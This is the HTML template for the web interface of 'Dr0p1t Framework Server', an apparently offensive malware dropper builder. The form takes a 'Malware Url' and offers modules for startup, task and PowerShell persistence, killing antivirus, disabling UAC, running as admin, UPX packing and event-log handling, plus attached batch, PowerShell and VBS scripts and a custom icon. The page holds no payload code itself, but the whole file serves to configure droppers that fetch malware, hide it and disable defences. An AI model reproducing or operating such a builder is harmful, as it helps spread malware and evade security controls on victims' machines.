<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>{{Page_title}}</title>
<link rel=stylesheet media="screen" type="text/css" href="https://codepen.io/anon/pen/bRoGgq.css">
<style type="text/css">
<!--
body,td,th {
	font-family: Courier New, Courier, mono;
color: #33FF33;
}
body {
background-color: #000000;
}
.Headline {font-size: x-large}
.comment {font-size: small}
.Big {
	font-size: large;
	font-weight: bold;
}
-->
</style></head>

<body >
<div align="center">


<hr>

<blockquote>
<pre>
<small>
     ,gggggggggggg,    ,ggggggggggg,      ,a888a,     ,ggggggggggg,      88  ,ggggggggggggggg
    dP"""88""""""Y8b, dP"""88""""""Y8,  ,8P"' `"Y8,  dP"""88""""""Y8,  ,d88 dP""""""88"""""""
    Yb,  88       `8b,Yb,  88      `8b ,8P       Y8, Yb,  88      `8b888888 Yb,_    88
     `"  88        `8b `"  88      ,8P 88         88  `"  88      ,8P    88  `""    88
         88         Y8     88aaaad8P"  88         88      88aaaad8P"     88         88
         88         d8     88""""Yb,   88         88      88"""""        88         88
         88        ,8P     88     "8b  88         88      88             88         88
         88       ,8P'     88      `8i `8b       d8'      88             88   gg,   88
         88______,dP'      88       Yb, `8ba, ,ad8'       88             88    "Yb,,8P
        888888888P"        88        Y8   "Y888P"         88             88      "Y8P'
                                            -- [D]r0p1t [F]ramework [S]erver --

</small><br/>

</pre>
</blockquote>


</div>

<form action="http://{{IP}}/params" method="post">

<div align="center">
<div align="center">
<table border="1" cellpadding="5" cellspacing="0">
		<tr align="left" valign="middle">
			<td><strong class="Big">
				<span class="Big">Malware Url : </span><input name="xurl" type="url" size="40" required><b>   Zip: </b><input type="checkbox" name="zip" value="1" ></td>

			</strong></td>

  <table border="1" cellpadding="10" cellspacing="0">
      <tr align="left" valign="middle">
				<td><strong class="Big">Modules : </strong></td>

      </tr>
      <tr align="left" valign="middle">
        <td valign="top"><table border="0">
				<tr align="left" valign="middle">
					<td><strong class="Big">Startup persistence</strong><br></td>
					<td><input type="checkbox" name="sp" value="1"  ></td>
				</tr>
				<tr align="left" valign="middle">
					<td><strong class="Big">Task persistence</strong><br></td>
					<td><input type="checkbox" name="tp" value="1"  ></td>
				</tr>
				<tr align="left" valign="middle">
					<td><strong class="Big">Powershell persistence</strong><br></td>
					<td><input type="checkbox" name="psp" value="1"  ></td>
				</tr>
				<tr align="left" valign="middle">
					<td><strong class="Big">Kill antivirus</strong><br></td>
					<td><input type="checkbox" name="killav" value="1"  ></td>
				</tr>
				<tr align="left" valign="middle">
					<td><strong class="Big">Disable UAC</strong><br></td>
					<td><input type="checkbox" name="disuac" value="1"  ></td>
				</tr>
				<tr align="left" valign="middle">
					<td><strong class="Big">Run As Admin</strong><br></td>
					<td><input type="checkbox" name="runas" value="1"  ></td>
				</tr>
				<tr align="left" valign="middle">
					<td><strong class="Big">Compress with upx</strong><br></td>
					<td><input type="checkbox" name="upx" value="1"  ></td>
				</tr>
				<tr align="left" valign="middle">
					<td><strong class="Big">No Clear Event</strong><br></td>
					<td><input type="checkbox" name="event" value="1"  ></td>
				</tr>
				<tr align="left" valign="middle">
					<td><strong class="Big">Only 32 bit devices</strong><br></td>
					<td><input type="checkbox" name="o32" value="1"  ></td>
				</tr>
				<tr align="left" valign="middle">
					<td><strong class="Big">Only 64 bit devices</strong><br></td>
					<td><input type="checkbox" name="o64" value="1"  ></td>
				</tr>
  </table>

				<tr>
					<strong class="Big">
					<td align="left" valign="middle"><span class="Big">Batchfile Script  </span></td>
					<td align="left" valign="middle"><input name="bats" type="text" size="30" maxlength="100"></td>
					</strong>
				</tr>
				<tr>
					<strong class="Big">
					<td align="left" valign="middle"><span class="Big">Powershell Script  </span></td>
					<td align="left" valign="middle"><input name="pss" type="text" size="30" maxlength="100"></td>
					</strong>
				</tr>
				<tr>
					<strong class="Big">
					<td align="left" valign="middle"><span class="Big">VBS Script  </span></td>
					<td align="left" valign="middle"><input name="vbss" type="text" size="30" maxlength="100"></td>
					</strong>
				</tr>

				<tr>
					<strong class="Big">
					<td align="left" valign="middle"><span class="Big">Icon  </span></td>
					<td align="left" valign="middle"><input name="ico" type="text" size="30" maxlength="100"></td>
					</strong>
				</tr>

  </table>
</div>
<p align="center"><br/>
  <input type="submit" value="Submit">
</p>
</form>
<br>
<hr>
Basic old school theme - Edited by karim shoair (D4Vinci) :"D

 </div>
</body>
</html>
